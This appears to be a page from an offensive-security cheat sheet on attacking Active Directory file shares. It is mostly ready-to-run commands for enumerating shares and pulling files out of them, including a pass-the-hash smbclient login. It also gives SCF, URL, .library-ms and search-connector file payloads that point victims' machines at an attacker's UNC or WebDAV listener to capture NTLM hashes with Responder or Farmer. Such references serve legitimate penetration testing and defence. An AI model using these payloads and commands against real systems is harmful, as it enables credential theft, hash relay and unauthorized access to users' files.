internal-shares.md (6320B)
1 --- 2 title: "Internal - Shares" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/internal-shares.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/internal-shares.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Internal - Shares 12 13 ## READ Permission 14 15 > Some shares can be accessible without authentication, explore them to find some juicy files 16 17 * [Pennyw0rth/NetExec](https://github.com/Pennyw0rth/NetExec) - The Network Execution Tool 18 19 ```ps1 20 nxc smb 10.0.0.4 -u guest -p '' -M spider_plus 21 nxc smb 10.0.0.4 -u guest -p '' --get-file \\info.txt.txt infos.txt.txt --share OPENSHARE 22 ``` 23 24 * [ShawnDEvans/smbmap](https://github.com/ShawnDEvans/smbmap) - a handy SMB enumeration tool 25 26 ```powershell 27 smbmap -H 10.10.10.10 # null session 28 smbmap -H 10.10.10.10 -r PATH # recursive listing 29 smbmap -H 10.10.10.10 -u invaliduser # guest smb session 30 smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*" 31 ``` 32 33 * [byt3bl33d3r/pth-smbclient](https://github.com/byt3bl33d3r/pth-toolkit) from path-toolkit 34 35 ```powershell 36 pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share 37 pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$ 38 ls # list files 39 cd # move inside a folder 40 get # download files 41 put # replace a file 42 ``` 43 44 * [SecureAuthCorp/smbclient](https://github.com/SecureAuthCorp/impacket) from Impacket 45 46 ```powershell 47 smbclient -I 10.10.10.100 -L ACTIVE -N -U "" 48 Sharename Type Comment 49 --------- ---- ------- 50 ADMIN$ Disk Remote Admin 51 C$ Disk Default share 52 IPC$ IPC Remote IPC 53 NETLOGON Disk Logon server share 54 Replication Disk 55 SYSVOL Disk Logon server share 56 Users Disk 57 use Sharename # select a Sharename 58 cd Folder # move inside a folder 59 ls # list files 60 ``` 61 62 * [smbclient](https://www.samba.org/samba/docs/4.9/man-html/smbclient.1.html) - from Samba, ftp-like client to access SMB/CIFS resources on servers 63 64 ```powershell 65 smbclient -U username //10.0.0.1/SYSVOL 66 smbclient //10.0.0.1/Share 67 68 # Download a folder recursively 69 smb: \> mask "" 70 smb: \> recurse ON 71 smb: \> prompt OFF 72 smb: \> lcd '/path/to/go/' 73 smb: \> mget * 74 ``` 75 76 * [SnaffCon/Snaffler](https://github.com/SnaffCon/Snaffler) - a tool for pentesters to help find delicious candy 77 78 ```ps1 79 snaffler.exe -s - snaffler.log 80 81 # Snaffle all the computers in the domain 82 ./Snaffler.exe -d domain.local -c <DC> -s 83 84 # Snaffle specific computers 85 ./Snaffler.exe -n computer1,computer2 -s 86 87 # Snaffle a specific directory 88 ./Snaffler.exe -i C:\ -s 89 ``` 90 91 ## WRITE Permission 92 93 Write SCF and URL files on a writeable share to farm for user's hashes and eventually replay them. 94 95 Theses attacks can be automated with [Farmer.exe](https://github.com/mdsecactivebreach/Farmer) and [Crop.exe](https://github.com/mdsecactivebreach/Farmer/tree/main/crop) 96 97 ```ps1 98 # Farmer to receive auth 99 farmer.exe <port> [seconds] [output] 100 farmer.exe 8888 0 c:\windows\temp\test.tmp # undefinitely 101 farmer.exe 8888 60 # one minute 102 103 # Crop can be used to create various file types that will trigger SMB/WebDAV connections for poisoning file shares during hash collection attacks 104 crop.exe <output folder> <output filename> <WebDAV server> <LNK value> [options] 105 Crop.exe \\\\fileserver\\common mdsec.url \\\\workstation@8888\\mdsec.ico 106 Crop.exe \\\\fileserver\\common mdsec.library-ms \\\\workstation@8888\\mdsec 107 ``` 108 109 ### SCF Files 110 111 Drop the following `@something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0` 112 113 ```powershell 114 [Shell] 115 Command=2 116 IconFile=\\10.10.10.10\Share\test.ico 117 [Taskbar] 118 Command=ToggleDesktop 119 ``` 120 121 Using [`netexec`](https://github.com/Pennyw0rth/NetExec/blob/master/cme/modules/slinky.py): 122 123 ```ps1 124 netexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=IP_RESPONDER #scf 125 netexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER #lnk 126 netexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER CLEANUP 127 ``` 128 129 ### URL Files 130 131 This attack also works with `.url` files and `responder -I eth0 -v`. 132 133 ```powershell 134 [InternetShortcut] 135 URL=whatever 136 WorkingDirectory=whatever 137 IconFile=\\10.10.10.10\%USERNAME%.icon 138 IconIndex=1 139 ``` 140 141 ### Windows Library Files 142 143 > Windows Library Files (.library-ms) 144 145 ```xml 146 <?xml version="1.0" encoding="UTF-8"?> 147 <libraryDescription xmlns="<http://schemas.microsoft.com/windows/2009/library>"> 148 <name>@windows.storage.dll,-34582</name> 149 <version>6</version> 150 <isLibraryPinned>true</isLibraryPinned> 151 <iconReference>imageres.dll,-1003</iconReference> 152 <templateInfo> 153 <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType> 154 </templateInfo> 155 <searchConnectorDescriptionList> 156 <searchConnectorDescription> 157 <isDefaultSaveLocation>true</isDefaultSaveLocation> 158 <isSupported>false</isSupported> 159 <simpleLocation> 160 <url>\\\\workstation@8888\\folder</url> 161 </simpleLocation> 162 </searchConnectorDescription> 163 </searchConnectorDescriptionList> 164 </libraryDescription> 165 ``` 166 167 ### Windows Search Connectors Files 168 169 > Windows Search Connectors (.searchConnector-ms) 170 171 ```xml 172 <?xml version="1.0" encoding="UTF-8"?> 173 <searchConnectorDescription xmlns="<http://schemas.microsoft.com/windows/2009/searchConnector>"> 174 <iconReference>imageres.dll,-1002</iconReference> 175 <description>Microsoft Outlook</description> 176 <isSearchOnlyItem>false</isSearchOnlyItem> 177 <includeInStartMenuScope>true</includeInStartMenuScope> 178 <iconReference>\\\\workstation@8888\\folder.ico</iconReference> 179 <templateInfo> 180 <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType> 181 </templateInfo> 182 <simpleLocation> 183 <url>\\\\workstation@8888\\folder</url> 184 </simpleLocation> 185 </searchConnectorDescription> 186 ``` 187 188 ## References 189 190 * [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)